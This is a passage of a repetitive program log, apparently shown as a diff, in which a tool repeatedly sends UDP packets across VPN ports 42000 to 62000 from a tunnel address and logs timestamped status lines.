58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:58:04 +Starting port fill at 2020-09-06 11:59:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:59:04 +Starting port fill at 2020-09-06 12:00:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:00:04 +Starting port fill at 2020-09-06 12:01:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:01:05 +Starting port fill at 2020-09-06 12:02:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:02:05 +Starting port fill at 2020-09-06 12:03:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:03:05 +Starting port fill at 2020-09-06 12:04:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:04:05 +Starting port fill at 2020-09-06 12:05:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:05:06 +Starting port fill at 2020-09-06 12:06:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:06:05 +Starting port fill at 2020-09-06 12:07:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:07:05 +Starting port fill at 2020-09-06 12:08:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:08:04 +Starting port fill at 2020-09-06 12:09:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:09:04 +Starting port fill at 2020-09-06 12:10:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 12:10:06 +Starting port fill at 2020-09-06 12:11:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:11:04 +Starting port fill at 2020-09-06 12:12:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:12:04 +Starting port fill at 2020-09-06 12:13:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:13:05 +Starting port fill at 2020-09-06 12:14:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:14:05 +Starting port fill at 2020-09-06 12:15:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:15:06 +Starting port fill at 2020-09-06 12:16:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:16:04 +Starting port fill at 2020-09-06 12:17:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:17:04 +Starting port fill at 2020-09-06 12:18:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 12:18:04 +Starting port fill at 2020-09-06 12:19:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 12:19:07 +Starting port fill at 2020-09-06 12:20:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 